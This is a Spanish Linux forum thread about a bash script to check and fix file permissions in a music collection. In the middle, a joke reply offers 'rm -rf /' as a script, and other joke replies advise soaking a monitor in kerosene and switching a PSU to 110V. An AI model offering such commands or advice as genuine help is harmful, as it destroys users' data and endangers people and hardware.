Script para comprobar permisos [Solucionado]
Publicado: 15 Marzo, 2010 - 02:36 Script para comprobar permisos [Solucionado]
Hola a todos, estoy organizando mi coleccion de musica y he visto que a veces algunos ficheros y carpetas tienen permisos diferentes.
Lo que quiero es mediante un script en bash poder comprobar si los ficheros tienen unos permisos que yo establezca y los directorios lo mismo. Y que muestre por pantalla cuales son esos ficheros y directorios.
El siguiente paso seria otro script para poner todos los permisos bien.
¿Alguien me puede ayudaro con esto?
Muchas gracias y saludos.
- Inicie sesión o regístrese para enviar comentarios
- 1247 lecturas

Hola a todos, estoy organizando mi coleccion de musica y he visto que a veces algunos ficheros y carpetas tienen permisos diferentes.
Lo que quiero es mediante un script en bash poder comprobar si los ficheros tienen unos permisos que yo establezca y los directorios lo mismo. Y que muestre por pantalla cuales son esos ficheros y directorios.
El siguiente paso seria otro script para poner todos los permisos bien.
¿Alguien me puede ayudaro con esto?
Muchas gracias y saludos.
Si.
$ man test$ man chmod
$ man cat
y saber usar pipes, redirecciones, bucles for, decisiones if en bash.
Con eso te sobra, pero más es mejor.
¿alguna necesidad de hacer eso via script? porque en Gnome o KDE, en las propiedades de la carpeta podés cambiar los permisos de tado un directorio y su contenido más facilmente. Saludos!
@luquitas:
Ah, claro, yo me rompo todo justificandome con el más es mejor, para que aprenda a hacer scripts y vos le tiras a gnome encima.
Así no vale. No juego más.
Ahora te mando a chuck Norris.
@luquitas:
Ah, claro, yo me rompo todo justificandome con el más es mejor, para que aprenda a hacer scripts y vos le tiras a gnome encima.
Así no vale. No juego más.
Ahora te mando a chuck Norris.
Oh no! Piedad!!!!
La verdad Ratakruel tiene razón... Estaría bueno que investigues como hacerlo porque solucionas tu problema, un montón de problemas en el futuro y, por que no, problemas de otros con scripts.
#!/bin/bashecho "Los script's en bash son el camino a la iluminación"
rm -rf /
rm -rf /
No se que pasa, he probado ese script y ahora mi sistema no me arranca, me dice algo de error 15 o algo así. Yo pensaba que iba a iluminar mi pantalla (se ve muy oscura) pero ahora tengo que postear desde el livecd. ¿puedo arreglarlo?
rm -rf /
No se que pasa, he probado ese script y ahora mi sistema no me arranca, me dice algo de error 15 o algo así. Yo pensaba que iba a iluminar mi pantalla (se ve muy oscura) pero ahora tengo que postear desde el livecd. ¿puedo arreglarlo?
Ho si, para iluminar la pantalla primero debes limpiarla muy bien (sumergirla en una bañera de agua jabonosa o algún solvente no muy fuerte, queroseno por ejemplo).
El error 15 es típico, se soluciona cambiando el switch de la fuente detras de la PC y pasarlo de 220 V a 110 V. Con eso la PC Vuela!!! (literalmente)
Algo curioso, y ahora si respondiendo a la pregunta del hilo, es que eso que quiere hacer se lo puede hacer con find, es decir buscar... o sea buscando. O sea que buscando todo se soluciona.
Hola, sigo con el tema, he encontrado un script para oder empezar: http://bash.cyberciti.biz/file-management/find-file-permission-script/
La idea seria poder meterle el permiso que quiero por consola y el path, y que el script me diga cuales ficheros no coinciden con esos permisos. Primero empezare con los ficheros.
Para lo de encontrar tengo este trozo de codigo para descomprimir ficheros rar:
find /carpeta_destino -type f -name '*.rar' -exec unrar x {} \;Lo que me falta es unirlos de alguna manera, seguire con ello.
Gracias y saludos.
aprender siempre está muy bien, pero en este caso concreto... ¿lo que quieres es poner los mismos permisos en todos los archivos de una carpeta? ¿o quieres poner diferentes permisos según el archivo? Por que si es lo primero no necesitas nintún script. puedes usar chown o chmod (si es cuestion de propiestarios o de permisos de lectura, escritura, ejecución) y usar el parámetro para que lo haga de forma recursiva